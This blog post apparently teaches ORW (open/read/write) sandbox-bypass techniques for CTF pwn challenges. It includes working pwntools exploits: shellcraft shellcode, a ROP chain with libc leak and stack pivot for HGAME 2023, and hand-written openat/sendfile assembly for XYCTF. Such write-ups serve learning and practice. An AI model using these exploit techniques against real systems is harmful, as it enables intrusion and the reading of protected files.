<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="zach0ry">
    
    <title>
        
            orw |
        
        b1nary
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/fire.svg">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"en","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"b1nary","author":"zach0ry","avatar":"/images/author.jpg","logo":"/images/fire.svg","favicon":"/images/fire.svg"},"menu":{"home":"/                        || fa-solid fa-home","archives":"/archives            || fa-solid fa-box-archive","tags":"/tags                  || fa-solid fa-tags","categories":"/categories      || fa-solid fa-layer-group"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"Keep writing and Keep loving.","hitokoto":true},"social_contact":{"enable":false,"links":{"github":null,"weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":false,"percent":true,"hide_header":true},"home":{"announcement":null,"category":true,"tag":true,"post_datetime":"created"},"post":{"author_badge":null,"enable":true,"level_badge":true,"custom_badge":["炼气","筑基","结丹","元婴","化神","渡劫","大乘"],"word_count":{"wordcount":false,"min2read":false},"datetime_format":"YYYY-MM-DD","copyright_info":false,"share":true,"reward":{"enable":false,"img_link":null,"text":null,"icon":null}},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"obsidian"},"toc":{"enable":true,"number":true,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":false,"site_pv":false,"page_pv":false}},"local_search":{"enable":true,"preload":true},"search":{"path":"search.json","field":"post","content":true,"format":"striptags"},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.39"},"waline":{"server_url":null,"reaction":false,"version":"3.3.2"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":false,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2020,"word_count":false,"site_deploy":{"enable":false,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{},"version":"4.2.5"}
    KEEP.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"}
    KEEP.language_code_block = {"copy":"Copy code","copied":"Copied","fold":"Fold code block","folded":"Folded"}
    KEEP.language_copy_copyright = {"copy":"Copy copyright info","copied":"Copied","title":"Original post title","author":"Original post author","link":"Original post link"}
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/fire.svg">
                </a>
            
            <a class="site-name border-box" href="/">
               b1nary
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-home"></i>
                                
                                HOME
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-box-archive"></i>
                                
                                ARCHIVES
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/tags">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-tags"></i>
                                
                                TAGS
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/categories">
                                
                                    <i class="menu-text-color menu-icon fa-solid fa-layer-group"></i>
                                
                                CATEGORIES
                                
                            </a>
                            
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="menu-text-color fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-home"></i>
                                </span>
                            
                            HOME
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-box-archive"></i>
                                </span>
                            
                            ARCHIVES
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/tags">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-tags"></i>
                                </span>
                            
                            TAGS
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/categories">
                            
                                <span class="menu-icon-wrap border-box flex-center">
                                    <i class="drawer-menu-text-color menu-icon fa-solid fa-layer-group"></i>
                                </span>
                            
                            CATEGORIES
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        orw
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/author.jpg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">zach0ry</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2025-08-04</span>
            </span>

            
                <span class="meta-info-item post-update-date">
                    <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                    <span class="datetime" data-updated="Tue Sep 02 2025 17:34:46 GMT+0800">2025-09-02</span>
                </span>
            
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/exercise-pwn/">exercise_pwn</a></li>
                        
                    
                </ul>
            </span>
        

        
            <span class="post-tag meta-info-item border-box">
                <ul class="post-tag-ul">
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/PWN/">PWN</a></li>
                        
                    
                            <li class="tag-item"><span class="tag-separator"><i class="icon fas fa-hashtag"></i></span><a href="/tags/orw/">orw</a></li>
                        
                    
                </ul>
            </span>
        

        
        
        
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <h2 id="orw基础"><a href="#orw基础" class="headerlink" title="orw基础"></a>orw基础</h2><p>orw是open、read和write三个系统调用的缩写。orw 攻击是一种绕过沙箱（Sandbox）或NX保护的技术，其核心思想是：不直接获取shell，而是通过这三个系统调用来读取目标文件（通常是flag文件），然后将其内容打印到标准输出，从而获得flag。</p>
<p>传统的缓冲区溢出攻击通常会尝试注入一段 shellcode，这段 shellcode 的作用是执行 execve(“&#x2F;bin&#x2F;sh”, NULL, NULL) 来获取一个交互式 shell。然而，在以下两种情况下，这种传统攻击会失败：</p>
<p>NX（No-eXecute）保护：如果程序的栈是不可执行的，你注入的 shellcode 无法在栈上运行。</p>
<p>seccomp 沙箱：一些程序会使用 seccomp（安全计算模式）来限制进程可以调用的系统调用。如果 execve 被禁用，即使你成功注入了 shellcode，它也无法执行。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">open(const char *pathname, int flags，mode_t mode);</span><br></pre></td></tr></table></figure>

<p>pathname → 文件路径地址（放在 RDI）</p>
<p>flags → 打开方式，比如 0 表示 O_RDONLY（放在 RSI）</p>
<p>mode → 一般读文件不用，默认即可（放在 RDX）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">int openat(int dirfd, const char *pathname, int flags, mode_t mode);</span><br></pre></td></tr></table></figure>

<p><code>dirfd</code> （目录文件描述符）</p>
<p><code>pathname</code> （文件路径）</p>
<p><code>flags</code> （打开方式，O_RDONLY &#x2F; O_WRONLY 等）</p>
<p><code>mode</code> （创建文件时的权限位，open 时可能不用）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssize_t read(int fd, void *buf, size_t count);</span><br><span class="line">ssize_t write(int fd, const void *buf, size_t count);</span><br></pre></td></tr></table></figure>

<p><code>fd</code> → 文件描述符，比如 <code>open(&quot;/flag&quot;)</code> 的返回值 3（放在 <strong>RDI</strong>）</p>
<p><code>buf</code> → 存放&#x2F;要写 数据的缓冲区地址（放在 <strong>RSI</strong>）</p>
<p><code>count</code> → 读取&#x2F;输出 的字节数（放在 <strong>RDX</strong>）</p>
<p>具体的泄露有两种方法，一种是ret2syscall，用题目自己的指令去操作</p>
<p>还有就是shellcraft,但是它的要求会更高，因为其本质就是 shellcode，使用它要求目标内存区域必须 <strong>可写可执行</strong>（W+X）</p>
<p>还有一个<code>sendfile</code>函数,兼具了ORW中read和write的功能！</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssize_t sendfile(int out_fd, int in_fd, off_t *offset, size_t count);</span><br></pre></td></tr></table></figure>

<p><strong><code>out_fd</code></strong><br> 输出文件描述符，通常是 <strong>socket</strong>（例如客户端连接的套接字）。</p>
<p><strong><code>in_fd</code></strong><br> 输入文件描述符，通常是 <strong>打开的文件</strong>。</p>
<p><strong><code>offset</code></strong><br> 输入文件的偏移量指针。</p>
<ul>
<li>如果为 <code>NULL</code>，则使用 <code>in_fd</code> 当前的文件偏移量，并自动更新。</li>
<li>如果不为 <code>NULL</code>，则从指定偏移量开始读文件，但不会修改 <code>in_fd</code> 的偏移量。</li>
</ul>
<p><strong><code>count</code></strong><br> 希望传输的字节数。</p>
<h2 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h2><h3 id="基础"><a href="#基础" class="headerlink" title="基础"></a>基础</h3><p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250804164745934.png"  alt="image-20250804164745934"></p>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250804164759473.png"  alt="image-20250804164759473"></p>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250804164828181.png"  alt="image-20250804164828181"></p>
<p>这个就是典型的orw</p>
<p>用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">seccomp-tools dump ./orw #查看允许的函数调用</span><br></pre></td></tr></table></figure>

<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250804171950287.png"  alt="image-20250804171950287"></p>
<h4 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">r = remote(&#x27;node5.buuoj.cn&#x27;,29475)</span><br><span class="line"></span><br><span class="line">context.log_level = &#x27;debug&#x27;</span><br><span class="line">elf = ELF(&#x27;orw&#x27;)</span><br><span class="line"></span><br><span class="line">shellcode = shellcraft.open(&#x27;/flag&#x27;)</span><br><span class="line">shellcode += shellcraft.read(&#x27;eax&#x27;,&#x27;esp&#x27;,100)</span><br><span class="line">shellcode += shellcraft.write(1,&#x27;esp&#x27;,100)</span><br><span class="line">shellcode = asm(shellcode)</span><br><span class="line"></span><br><span class="line">r.sendline(shellcode)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="HGAME-2023-week1-orw"><a href="#HGAME-2023-week1-orw" class="headerlink" title="[HGAME 2023 week1]orw"></a>[HGAME 2023 week1]orw</h3><p><a class="link"   target="_blank" rel="noopener" href="https://www.nssctf.cn/problem/3489" >题目<i class="fas fa-external-link-alt"></i></a></p>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250902153756402.png"  alt="image-20250902153756402"></p>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250902153805183.png"  alt="image-20250902153805183"></p>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250902153850518.png"  alt="image-20250902153850518"></p>
<p>可以看到禁了execve和execveat</p>
<p>思路：先泄露libc基地址，(可以看到read读入的数量比较大，所以可以把泄露puts的写入rop链后面)</p>
<p>之后lea把read的读入位置劫持道我们对应的bss位置，之后在这里放入orw的绕过，最后leave跳转过去让它执行就可以了</p>
<h4 id="脚本-1"><a href="#脚本-1" class="headerlink" title="脚本"></a>脚本</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">import sys</span><br><span class="line">from LibcSearcher import *</span><br><span class="line">file_path = &quot;./vuln&quot;</span><br><span class="line">remote_host = &quot;node5.anna.nssctf.cn&quot;</span><br><span class="line">remote_port = 25492</span><br><span class="line">libc=ELF(&quot;./libc-2.31.so&quot;)</span><br><span class="line">context(arch=&#x27;amd64&#x27;, os=&#x27;linux&#x27;, log_level=&#x27;debug&#x27;)</span><br><span class="line">elf = ELF(file_path)</span><br><span class="line"></span><br><span class="line">if &#x27;re&#x27; in sys.argv:</span><br><span class="line">    p = remote(remote_host, remote_port)</span><br><span class="line">else:</span><br><span class="line">    p = process(file_path)</span><br><span class="line">    #</span><br><span class="line">    gdb.attach(p, &quot;b*0x4012EE&quot;)</span><br><span class="line"></span><br><span class="line">def sla(a, b):</span><br><span class="line">  p.sendlineafter(a, b)</span><br><span class="line">def ru(a):</span><br><span class="line">  p.recvuntil(a)</span><br><span class="line">def sa(a, b):</span><br><span class="line">  p.sendafter(a, b)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">puts_got=elf.got[&quot;puts&quot;]</span><br><span class="line">puts_plt=elf.plt[&quot;puts&quot;]</span><br><span class="line">lea=0x4012CF </span><br><span class="line">ret=0x4012EF </span><br><span class="line">rdi=0x401393</span><br><span class="line">bss=0x404300 </span><br><span class="line">rbp=0x40117d</span><br><span class="line">main=0x4012F0 </span><br><span class="line">leave=0x4012EE    </span><br><span class="line">pay=b&quot;a&quot;*0x108+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main)</span><br><span class="line">sa(b&quot;Maybe you can learn something about seccomp, before you try to solve this task.\n&quot;, pay)</span><br><span class="line"></span><br><span class="line">puts=u64(p.recvuntil(b&quot;\x7f&quot;)[-6:]+b&quot;\x00\x00&quot;)</span><br><span class="line">print(b&quot;puts===========================&quot;+hex(puts).encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">libc_base=puts-libc.sym[&quot;puts&quot;]</span><br><span class="line">rdx = libc_base + 0x142c92 </span><br><span class="line">rsi = libc_base + 0x2601f </span><br><span class="line">open=libc_base+libc.sym[&quot;open&quot;]</span><br><span class="line">read=libc_base+libc.sym[&quot;read&quot;]</span><br><span class="line">write=libc_base+libc.sym[&quot;write&quot;]</span><br><span class="line"></span><br><span class="line">pay=b&quot;a&quot;*0x100+p64(bss+0x400)+p64(lea)</span><br><span class="line">p.recvuntil(&#x27;Maybe you can learn something about seccomp, before you try to solve this task.&#x27;)</span><br><span class="line">p.send(pay)</span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line">pay=b&quot;/flag\x00\x00\x00&quot;</span><br><span class="line">pay+=p64(rdi)+p64(bss+0x300)+p64(rsi)+p64(0)+p64(open)</span><br><span class="line">pay+=p64(rdi)+p64(3)+p64(rsi)+p64(bss+0x300)+p64(rdx)+p64(0x100)+p64(read)</span><br><span class="line">pay+=p64(rdi)+p64(1)+p64(rsi)+p64(bss+0x300)+p64(rdx)+p64(0x100)+p64(write)</span><br><span class="line">pay=pay.ljust(0x100,b&#x27;\x00&#x27;)+p64(bss+0x300)+p64(leave)       </span><br><span class="line">p.send(pay)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="XYCTF-orw"><a href="#XYCTF-orw" class="headerlink" title="XYCTF orw"></a>XYCTF orw</h3><p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250902172558291.png"  alt="image-20250902172558291"></p>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250902172616138.png"  alt="image-20250902172616138"></p>
<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250902172749552.png"  alt="image-20250902172749552"></p>
<p>rsp只想一个新的栈空间，而且这个地方是由rdi控制的，我们构造的rop链无法使用，所以只能自己手搓汇编</p>
<p>果然汇编代码才是一切的基础:candle:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">context(log_level=&#x27;debug&#x27;, arch = &quot;amd64&quot;,os= &#x27;linux&#x27;,terminal = [&#x27;tmux&#x27;,&#x27;splitw&#x27;,&#x27;-h&#x27;])</span><br><span class="line"></span><br><span class="line">p = process(&#x27;./vuln&#x27;)</span><br><span class="line">#p = remote(&quot;xyctf.top&quot;,60030 )</span><br><span class="line">libc  =ELF(&quot;./libc.so.6&quot;)</span><br><span class="line">elf = ELF(&#x27;./vuln&#x27;)</span><br><span class="line"></span><br><span class="line">def convert_str_asmencode(content: str):</span><br><span class="line">    out = &quot;&quot;</span><br><span class="line">    for i in content:</span><br><span class="line">        out = hex(ord(i))[2:] + out</span><br><span class="line">    out = &quot;0x&quot; + out</span><br><span class="line">    return out #将str转换为十六进制数，并在开头补上&quot;0x&quot;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if p.recvline()==b&#x27;show your magic again\n&#x27;:</span><br><span class="line">    shellcode=f&quot;&quot;&quot;</span><br><span class="line">    xor rsi,rsi;</span><br><span class="line">    mov rbx,&#123;convert_str_asmencode(&quot;/flag&quot;)&#125;;</span><br><span class="line">    push rbx;</span><br><span class="line">    mov rdx,0;   #设置oflag为0</span><br><span class="line">    mov r10,0;</span><br><span class="line">    mov rdi,3;   #文件描述符3</span><br><span class="line">    mov rsi,rsp</span><br><span class="line">    mov eax,257; #openat的系统调用号</span><br><span class="line">    syscall;</span><br><span class="line"></span><br><span class="line">    mov rsi,3;  #in_fd</span><br><span class="line">    mov r10,50; #n_bytes</span><br><span class="line">    xor rdx,rdx;</span><br><span class="line">    mov rdi,rdx;</span><br><span class="line">    inc rdi;    #out_fd</span><br><span class="line">    mov eax,40; #sendfile的系统调用号</span><br><span class="line">    syscall;</span><br><span class="line"></span><br><span class="line">    mov rdi,0;</span><br><span class="line">    mov rax,60; #exit</span><br><span class="line">    syscall</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    payload1 =asm(shellcode)</span><br><span class="line">    p.send(payload1)</span><br><span class="line">    p.interactive()</span><br></pre></td></tr></table></figure>

<p><img   src="https://cdn.jsdelivr.net/gh/zach0ry-zzh/Inage//test/image-20250902172936905.png"  alt="image-20250902172936905"></p>
<p>本篇参考了师傅<a class="link"   target="_blank" rel="noopener" href="https://www.cnblogs.com/falling-dusk" >Dusk<i class="fas fa-external-link-alt"></i></a>的博客</p>

                    
                </div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/PWN/">PWN</a>
                                    </li>
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/orw/">orw</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                            <div class="post-share-container border-box">
    <ul class="share-list-wrap border-box">
        <li class="qq share-item border-box flex-center tooltip"
            data-tooltip-content="Share to QQ"
        >
            <i class="fa-brands fa-qq"></i>
        </li>
        <li class="wechat share-item border-box flex-center tooltip tooltip-img"
            data-tooltip-content="Share to WeChat"
            data-tooltip-img-tip="Scan by WeChat"
            data-tooltip-img-style="background-color: #fff; top: -10px; padding: 0.6rem 0.6rem 0.1rem 0.6rem;"
        >
            <i class="fa-brands fa-weixin"></i>
        </li>
        <li class="weibo share-item border-box flex-center tooltip"
            data-tooltip-content="Share to WeiBo"
        >
            <i class="fa-brands fa-weibo"></i>
        </li>
    </ul>
</div>

                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2025/08/15/NewStar2024-pwn/"
                                   title="NewStar2024 pwn"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">NewStar2024 pwn</span>
                                        <span class="post-nav-item">Prev posts</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2025/08/02/libc%E7%8E%AF%E5%A2%83%E5%88%87%E6%8D%A2/"
                                   title="libc版本切换"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">libc版本切换</span>
                                        <span class="post-nav-item">Next posts</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#orw%E5%9F%BA%E7%A1%80"><span class="nav-number">1.</span> <span class="nav-text">orw基础</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BE%8B%E9%A2%98"><span class="nav-number">2.</span> <span class="nav-text">例题</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%BA%E7%A1%80"><span class="nav-number">2.1.</span> <span class="nav-text">基础</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC"><span class="nav-number">2.1.1.</span> <span class="nav-text">脚本</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#HGAME-2023-week1-orw"><span class="nav-number">2.2.</span> <span class="nav-text">[HGAME 2023 week1]orw</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC-1"><span class="nav-number">2.2.1.</span> <span class="nav-text">脚本</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XYCTF-orw"><span class="nav-number">2.3.</span> <span class="nav-text">XYCTF orw</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
    &copy;&nbsp;<span>2020</span>&nbsp;-&nbsp;2025
    
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">zach0ry</a>
        
    </div>

    <div class="theme-info info-item">
        Powered by&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;&&nbsp;Theme&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    

    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
